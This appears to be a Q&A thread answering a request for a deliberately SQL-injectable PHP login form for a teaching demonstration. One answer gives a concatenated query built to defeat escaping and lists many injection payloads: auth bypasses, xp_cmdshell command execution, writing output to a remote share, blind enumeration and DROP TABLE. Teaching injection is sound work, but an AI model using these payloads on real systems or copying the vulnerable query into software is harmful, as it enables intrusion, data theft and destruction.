I want to create a simple login and registration form, that allows me to demonstrate SQL injection, but I haven't been able to do so currently. Every time I attempt a sample form, SQLmap can't attack it. Can somebody give me a very simple and basic login and registration form that I can use to demonstrate SQL injection?
-
First time user inquiring about MySQL injection. Idk about this..grep– grep2011-07-12 15:46:37 +00:00Commented Jul 12, 2011 at 15:46
-
I was at a college camp, and my topic was SQL injection. I can assure you, I wasn't using it for malicious reasoning.michaelrmcneill– michaelrmcneill2011-12-13 03:07:11 +00:00Commented Dec 13, 2011 at 3:07
Add a comment
|
3 Answers
Just run the simplest unprotected query:
$query = "SELECT * FROM users WHERE username = ".stripslashes($_POST['username'])." AND password = ".stripslashes($_POST['password'])
and enjoy! The stripslashes() part is there in case you haven't magic_quotes already disabled (as it should be), to avoid some automatic escaping; otherwise you'll have purest injectable input, just pick up any sql injection you might find on the internet and see. Some example:
' or 1=1--
' or 1--
' or 1
\" or '1'
' or 1=1--
' OR ''='
' or 'a'='a
') or ('a'='a
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
'; EXEC master..sp_makewebtask \"\\10.10.1.3\share\output.html\", \"SELECT * FROM INFORMATION_SCHEMA.TABLES\"",
10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''='
' OR EXISTS(SELECT 1 FROM dual WHERE database() LIKE '%j%') AND ''='
' OR EXISTS(SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='test' AND TABLE_NAME='one') AND ''='
' OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA LIKE '%j%')>1 AND ''='
' OR EXISTS(SELECT * FROM users WHERE name LIKE '%r%') AND ''='
1;DROP TABLE `users`
And so on
2 Comments
Marc B
Which would only be useful on prehistoric/poorly-installed PHPs that have magic_quotes_gpc enabled.
Damien Pirsy
@Marc B There are still around there...Some of my company's clients have server with php4, others php 5.1, many have magic_quotes_gpc turned ON (and websites in Mambo CMS
*shivers*)If you like a massive sql test, there are a library that help me sometimes: http://sqlmap.sourceforge.net
It run a lot of sqlinjections tests and return great report.
Comments
Google for some prexisting pages i.e.:
http://www.greensql.net/node/3
Alternatively, you could just create a basic search box that searches a table in DB. Fill the table with random names and demonstrate how the search works and how SQL injection can drop the table, etc.
